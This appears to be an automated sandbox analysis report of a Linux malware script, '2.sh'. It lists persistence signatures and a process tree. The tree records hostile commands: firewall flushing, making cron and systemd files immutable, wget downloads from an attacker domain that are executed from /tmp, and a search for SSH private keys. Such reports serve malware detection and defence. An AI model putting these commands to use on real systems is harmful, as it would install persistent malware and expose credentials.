cda6a3a92d746c0be30c1809c15b2f5e344b724dcecbda7729234a798fb5218b

Resubmissions

09/09/2024, 16:59

240909-vhqbpa1frf 9

02/10/2023, 07:19

231002-h5hh5sga9y 9

Analysis

max time kernel
127s
max time network
133s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
02/10/2023, 07:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2.sh
Size

18KB
MD5

77e3046e6271f2871ed34497a06ce770
SHA1

b0a6bd77c3371ff4be33ba5070aa486204853b0b
SHA256

cda6a3a92d746c0be30c1809c15b2f5e344b724dcecbda7729234a798fb5218b
SHA512

49072c85b82cd494a7fa55172bc4f012b4f63e096d075cd8ec15aa8f037443408ce516e885f1c54cf65ee617a807adaf2634d3508017a790be40012ba819c7b5
SSDEEP

192:7jQ04oGAuVvZ7U3voFUzcF1pNbHqbbA8g5ugdjqDWThOAaI1cnUeGy3K1ywOK:7jpmVCYUw3MbA5WS09QuUeGyJTK

Score

9^/10

persistence rootkit

Malware Config

Signatures

Modifies the dynamic linker configuration file 1 TTPs 1 IoCs

Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.

persistence

Hijack Execution Flow

T1574

description	ioc	Process
File opened for modification	/etc/ld.so.preload	2.sh

Changes its process name 1 IoCs

description	ioc	pid
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	1123

Flushes firewall rules 2 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

pid	Process
587	ufw
766	iptables

Loads a kernel module 1 IoCs

Loads a Linux kernel module, potentially to achieve persistence

rootkit

ioc	pid	Process
/lib/modules/4.15.0-161-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	595	modprobe

Attempts to change immutable files 17 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
788	chattr
1473	chattr
1467	chattr
1478	chattr
787	chattr
1445	chattr
1123	systemd-sysv-install
1471	chattr
1475	chattr
1519	chattr
1562	chattr
1648	chattr
767	chattr
770	grep
1606	chattr
772	grep
1469	chattr

Creates/modifies Cron job 1 TTPs 7 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.gOvqGm	crontab
File opened for modification	/etc/cron.d/root	2.sh
File opened for modification	/etc/cron.d/apache	2.sh
File opened for modification	/etc/cron.d/nginx	2.sh
File opened for modification	/var/spool/cron/root	2.sh
File opened for modification	/var/spool/cron/crontabs/root	2.sh
File opened for modification	/etc/cron.hourly/oanacroner	2.sh

Creates/modifies environment variables 1 TTPs 2 IoCs

Creating/modifying environment variables is a common persistence mechanism.

persistence

Hijack Execution Flow

T1574

description	ioc	Process
File opened for modification	/root/.bash_profile	2.sh
File opened for modification	/root/.bashrc	2.sh

Enumerates running processes
Discovers information about currently running processes on the system

Modifies init.d 1 TTPs 1 IoCs

Adds/modifies system service, likely for persistence.

persistence

Boot or Logon Autostart Execution

T1547

description	ioc
File opened for modification	/etc/init.d/linux-d

Modifies rc script 1 TTPs 1 IoCs

Adding/modifying system rc scripts is a common persistence mechanism.

persistence

Boot or Logon Autostart Execution

T1547

description	ioc	Process
File opened for modification	/etc/rc.local	2.sh

Modifies systemd 1 TTPs 1 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

persistence

Boot or Logon Autostart Execution

T1547

description	ioc
File opened for modification	/etc/systemd/system/linux-d.service

Reads CPU attributes 1 TTPs 2 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Writes file to system bin folder 1 TTPs 1 IoCs

Hijack Execution Flow

T1574

description	ioc
File opened for modification	/bin/sysdown

Modifies Bash startup script 1 TTPs 2 IoCs

persistence

Boot or Logon Autostart Execution

T1547

description	ioc	Process
File opened for modification	/root/.bash_profile	2.sh
File opened for modification	/root/.bashrc	2.sh

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/333/stat	ps
File opened for reading	/proc/163/status	ps
File opened for reading	/proc/18/status	ps
File opened for reading	/proc/193/cmdline	ps
File opened for reading	/proc/770/cmdline	ps
File opened for reading	/proc/12/cmdline	ps
File opened for reading	/proc/26/status	ps
File opened for reading	/proc/115/status	ps
File opened for reading	/proc/578/cmdline	ps
File opened for reading	/proc/9/stat	ps
File opened for reading	/proc/81/status	ps
File opened for reading	/proc/163/status	ps
File opened for reading	/proc/458/stat	ps
File opened for reading	/proc/458/status	ps
File opened for reading	/proc/self/mountinfo	mount
File opened for reading	/proc/85/status	ps
File opened for reading	/proc/589/cmdline	ps
File opened for reading	/proc/11/stat	ps
File opened for reading	/proc/98/cmdline	ps
File opened for reading	/proc/17/cmdline	ps
File opened for reading	/proc/34/stat	ps
File opened for reading	/proc/193/stat	ps
File opened for reading	/proc/252/stat	ps
File opened for reading	/proc/sys/kernel/osrelease	systemctl
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/159/stat	ps
File opened for reading	/proc/13/cmdline	ps
File opened for reading	/proc/447/status	ps
File opened for reading	/proc/7/status	ps
File opened for reading	/proc/158/cmdline	ps
File opened for reading	/proc/155/cmdline	ps
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/16/status	ps
File opened for reading	/proc/1/stat	ps
File opened for reading	/proc/129/stat	ps
File opened for reading	/proc/15/status	ps
File opened for reading	/proc/420/cmdline	ps
File opened for reading	/proc/19/stat	ps
File opened for reading	/proc/31/stat	ps
File opened for reading	/proc/772/stat	ps
File opened for reading	/proc/3/cmdline	ps
File opened for reading	/proc/771/status	ps
File opened for reading	/proc/418/status	ps
File opened for reading	/proc/369/status	ps
File opened for reading	/proc/369/stat	ps
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/36/stat	ps
File opened for reading	/proc/26/stat	ps
File opened for reading	/proc/89/cmdline	ps
File opened for reading	/proc/166/cmdline	ps
File opened for reading	/proc/416/cmdline	ps
File opened for reading	/proc/21/stat	ps
File opened for reading	/proc/352/status	ps
File opened for reading	/proc/30/stat	ps
File opened for reading	/proc/12/stat	ps
File opened for reading	/proc/289/status	ps
File opened for reading	/proc/tty/drivers	ps
File opened for reading	/proc/369/stat	ps
File opened for reading	/proc/167/status	ps
File opened for reading	/proc/4/stat	ps
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/82/status	ps
File opened for reading	/proc/5/stat	ps

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/-bash	wget
File opened for modification	/tmp/-python	wget
File opened for modification	/tmp/.bashirc	-python

/tmp/2.sh
/tmp/2.sh
1⤵
- Modifies the dynamic linker configuration file
- Creates/modifies Cron job
- Creates/modifies environment variables
- Modifies rc script
- Modifies Bash startup script
PID:580
- /bin/mkdir
  mkdir -p /tmp /var/tmp
  2⤵
  PID:581
- /bin/chmod
  chmod 1777 /tmp /var/tmp
  2⤵
  PID:582
- /sbin/sysctl
  sysctl -w "fs.file-max=500000"
  2⤵
  PID:584
- /bin/mount
  mount -o "remount,exec" /tmp
  2⤵
  PID:585
- /bin/mount
  mount -o "remount,exec" /var/tmp
  2⤵
  - Reads runtime system information
  PID:586
- /usr/sbin/ufw
  ufw disable
  2⤵
  - Flushes firewall rules
  PID:587
- - /sbin/iptables
    /sbin/iptables -V
    3⤵
    PID:588
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:593
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:594
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        Enumerates kernel/hardware configuration
        
        PID:595
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:599
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:602
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:603
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      PID:604
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:605
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:606
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      PID:607
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:608
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      PID:609
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      PID:610
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      PID:611
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      PID:612
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      PID:613
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:614
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:615
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:616
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:617
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:618
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:619
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:620
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:621
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:622
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:623
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      PID:624
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:625
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:626
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:627
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:628
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:629
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:630
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:631
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:632
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:633
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:634
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:635
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:636
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:637
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:638
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:639
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      PID:640
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      PID:641
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      PID:642
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      PID:643
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      PID:644
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      PID:645
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:646
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:647
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:648
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:649
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:650
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:651
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:652
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:653
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:654
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:655
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      PID:656
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:657
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:658
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:659
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:660
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:661
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:662
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:663
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:664
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:665
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:666
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:667
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      PID:668
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:669
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:670
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:671
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:672
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:673
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:674
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:675
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      PID:676
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:677
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:678
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:679
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:680
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:681
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:682
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:683
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:684
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      PID:685
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:686
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:687
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      PID:688
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      PID:689
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      PID:690
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:691
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      PID:692
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      PID:693
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      PID:694
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:695
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:696
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:697
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:698
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:699
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:700
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:701
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:702
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:703
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:704
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      PID:705
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:706
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:707
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:708
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:709
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:710
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:711
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:712
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:713
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:714
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:715
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:716
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      PID:717
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:718
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:719
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      PID:720
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      PID:721
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      PID:722
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      PID:723
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      PID:724
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      PID:725
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      PID:726
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:727
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:728
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:729
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:730
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:731
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:732
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:733
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:734
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:735
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:736
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      PID:737
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:738
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:739
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:740
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:741
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:742
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:743
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:744
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:745
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:746
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:747
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:748
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      PID:749
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:750
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:751
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:752
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:753
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      PID:754
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:755
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:756
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      PID:757
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:758
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:759
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:760
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:761
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:762
- /sbin/iptables
  iptables -P INPUT ACCEPT
  2⤵
  PID:763
- /sbin/iptables
  iptables -P OUTPUT ACCEPT
  2⤵
  PID:764
- /sbin/iptables
  iptables -P FORWARD ACCEPT
  2⤵
  PID:765
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:766
- /usr/bin/chattr
  chattr -ia /etc/ld.so.preload
  2⤵
  - Attempts to change immutable files
  PID:767
- /usr/bin/id
  id -u
  2⤵
  PID:768
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:769
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  - Attempts to change immutable files
  PID:770
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:771
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  - Attempts to change immutable files
  PID:772
- /bin/uname
  uname -m
  2⤵
  PID:777
- /usr/bin/base64
  base64 -d
  2⤵
  PID:779
- /usr/bin/base64
  base64 -d
  2⤵
  PID:781
- /usr/bin/base64
  base64 -d
  2⤵
  PID:783
- /bin/chmod
  chmod +x /etc/init.d/linux-d
  2⤵
  PID:784
- /bin/chmod
  chmod +x /bin/sysdown
  2⤵
  PID:785
- /bin/chmod
  chmod +x /etc/systemd/system/linux-d.service
  2⤵
  PID:786
- /usr/bin/chattr
  chattr +ia /etc/systemd/system/linux-d.service
  2⤵
  - Attempts to change immutable files
  PID:787
- /usr/bin/chattr
  chattr +ia /etc/init.d/linux-d
  2⤵
  - Attempts to change immutable files
  PID:788
- /bin/systemctl
  systemctl start linux-d
  2⤵
  PID:789
- /bin/systemctl
  systemctl enable linux-d
  2⤵
  PID:1119
- - /lib/systemd/systemd-sysv-install
    /lib/systemd/systemd-sysv-install enable linux-d
    3⤵
    - Attempts to change immutable files
    PID:1123
  - - /usr/bin/getopt
      getopt -o r: --long root: -- enable linux-d
      4⤵
      PID:1125
  - - /usr/sbin/update-rc.d
      /usr/sbin/update-rc.d linux-d defaults
      4⤵
      PID:1126
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1138
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1138
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1138
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1138
    - - /sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1138
    - - /bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1138
  - - /usr/sbin/update-rc.d
      /usr/sbin/update-rc.d linux-d enable
      4⤵
      PID:1191
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1194
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1194
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1194
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1194
    - - /sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1194
    - - /bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Reads runtime system information
        
        PID:1194
- /usr/bin/chattr
  chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1
  2⤵
  - Attempts to change immutable files
  PID:1445
- /usr/bin/crontab
  crontab -r
  2⤵
  PID:1446
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1448
- /bin/chmod
  chmod +x /etc/cron.d/root
  2⤵
  PID:1464
- /usr/bin/chattr
  chattr +ia /etc/cron.d/root
  2⤵
  - Attempts to change immutable files
  PID:1467
- /bin/chmod
  chmod +x /etc/cron.d/apache
  2⤵
  PID:1468
- /usr/bin/chattr
  chattr +ia /etc/cron.d/apache
  2⤵
  - Attempts to change immutable files
  PID:1469
- /bin/chmod
  chmod +x /etc/cron.d/nginx
  2⤵
  PID:1470
- /usr/bin/chattr
  chattr +ia /etc/cron.d/nginx
  2⤵
  - Attempts to change immutable files
  PID:1471
- /bin/chmod
  chmod +x /var/spool/cron/root
  2⤵
  PID:1472
- /usr/bin/chattr
  chattr +ia /var/spool/cron/root
  2⤵
  - Attempts to change immutable files
  PID:1473
- /bin/chmod
  chmod +x /etc/cron.hourly/oanacroner
  2⤵
  PID:1474
- /usr/bin/chattr
  chattr +ia /etc/cron.hourly/oanacroner
  2⤵
  - Attempts to change immutable files
  PID:1475
- /usr/bin/chattr
  chattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1
  2⤵
  - Attempts to change immutable files
  PID:1478
- /bin/uname
  uname -m
  2⤵
  PID:1483
- /bin/uname
  uname -m
  2⤵
  PID:1514
- /usr/bin/chattr
  chattr -ia /tmp/-bash
  2⤵
  - Attempts to change immutable files
  PID:1519
- /usr/bin/wget
  wget --no-check-certificate -q -O /tmp/-bash http://dw.c4kdeliver.top/x86_64
  2⤵
  - Writes file to tmp directory
  PID:1520
- /bin/chmod
  chmod +x /tmp/-bash
  2⤵
  PID:1561
- /usr/bin/chattr
  chattr +ia /tmp/-bash
  2⤵
  - Attempts to change immutable files
  PID:1562
- /bin/chmod
  chmod +x /tmp/-bash
  2⤵
  PID:1563
- /tmp/-bash
  /tmp/-bash -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d
  2⤵
  PID:1564
- /tmp/-bash
  /tmp/-bash -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn
  2⤵
  PID:1565
- /bin/rm
  rm -rf /tmp/-bash
  2⤵
  PID:1568
- /bin/uname
  uname -m
  2⤵
  PID:1572
- /bin/uname
  uname -m
  2⤵
  PID:1604
- /usr/bin/chattr
  chattr -ia /tmp/-python
  2⤵
  - Attempts to change immutable files
  PID:1606
- /usr/bin/wget
  wget --no-check-certificate -q -O /tmp/-python http://dw.c4kdeliver.top/bashirc.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1611
- /bin/chmod
  chmod +x /tmp/-python
  2⤵
  PID:1643
- /usr/bin/chattr
  chattr +ia /tmp/-python
  2⤵
  - Attempts to change immutable files
  PID:1648
- /bin/chmod
  chmod +x /tmp/-python
  2⤵
  PID:1651
- /tmp/-python
  /tmp/-python
  2⤵
  - Writes file to tmp directory
  PID:1652
- /bin/rm
  rm -rf /tmp/-python
  2⤵
  PID:1653

/bin/ping
ping -c 1 dw.c4kdeliver.top
1⤵
PID:774

/bin/grep
grep "bytes of data"
1⤵
PID:775

/usr/bin/wc
wc -l
1⤵
PID:776

/bin/grep
grep -e 89.185.85.102 -e 167.71.233.11
1⤵
PID:1493

/bin/grep
grep ESTAB
1⤵
PID:1495

/usr/bin/sort
sort
1⤵
PID:1502

/usr/bin/uniq
uniq
1⤵
PID:1506

/usr/bin/wc
wc -l
1⤵
PID:1510

/bin/grep
grep -e 51.255.171.23
1⤵
PID:1576

/bin/grep
grep ESTAB
1⤵
PID:1579

/usr/bin/uniq
uniq
1⤵
PID:1588

/usr/bin/sort
sort
1⤵
PID:1586

/usr/bin/wc
wc -l
1⤵
PID:1595

/usr/bin/find
find /root/ /root /home -maxdepth 2 -name "id_rsa*"
1⤵
PID:1655

/bin/grep
grep -vw pub
1⤵
PID:1656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Hijack Execution Flow

T1574

Scheduled Task/Job

T1053

Privilege Escalation

